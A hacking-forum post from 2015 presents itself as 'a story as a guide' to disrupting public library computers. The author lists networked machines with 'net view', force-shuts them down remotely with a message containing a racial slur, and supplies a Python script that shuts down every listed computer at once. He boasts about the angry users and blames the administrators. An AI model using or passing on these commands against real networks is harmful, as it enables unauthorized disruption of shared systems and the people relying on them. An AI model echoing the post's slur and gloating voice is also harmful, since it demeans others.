Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 1 Vote(s) - 5 Average
Thread Closed 


Havoc in Public Networks filter_list
Author
Message
Havoc in Public Networks #1
So, this is more of a story as a guide than a proper tutorial:

I was at my local library a few hours ago. Shit, first time in 2 years. I thought, why not fuck around with the computers a little?

So, I booted up a computer, Windows XP (pfft), and ran cmd via the notepad method. The first thing I tried was a remote shutdown.

Code:
net view
shutdown –m \\compname –s –f -c "Niggurs." -t 5

It worked. I thought that no sysadmin could ever get that stupid... Like, how? These guys deserve everything they get. So I made a simple python script to shutdown everything. Tongue

First, I piped 'net view' to a .txt file, and tidied it up a bit so only computer names were left. Damn, that's a lot of computers.

Then, for the fun bit:

Code:
import os

f = open('computers.txt', 'r+')
for line in f.readlines():
    line = line.strip()
    os.system('shutdown -m ' + line + ' -s -f -t 0')
    print line
f.close()

Waited a few minutes for it to complete, looked around at everyone's bewildered and angry faces, and executed a hasty retreat.

[+] 5 users Like Eclipse's post





Messages In This Thread
Havoc in Public Networks - by Eclipse - 03-07-2015, 03:02 PM
RE: Havoc in Public Networks - by Baki Billa - 03-07-2015, 11:23 PM
RE: Havoc in Public Networks - by Master - 03-08-2015, 12:05 AM
RE: Havoc in Public Networks - by Eclipse - 03-08-2015, 12:11 AM
RE: Havoc in Public Networks - by Equinox - 03-08-2015, 12:14 AM
RE: Havoc in Public Networks - by Satan - 03-08-2015, 09:40 AM
RE: Havoc in Public Networks - by Eclipse - 03-08-2015, 09:50 AM
RE: Havoc in Public Networks - by Satan - 03-08-2015, 09:52 AM
RE: Havoc in Public Networks - by Eclipse - 03-08-2015, 09:53 AM
RE: Havoc in Public Networks - by Satan - 03-08-2015, 09:54 AM
RE: Havoc in Public Networks - by Eclipse - 03-08-2015, 09:55 AM
RE: Havoc in Public Networks - by Dismas - 03-08-2015, 10:08 AM
RE: Havoc in Public Networks - by Satan - 03-08-2015, 10:10 AM
RE: Havoc in Public Networks - by Eclipse - 03-08-2015, 10:16 AM
RE: Havoc in Public Networks - by darkcast - 08-30-2015, 03:21 PM



Users browsing this thread: 3 Guest(s)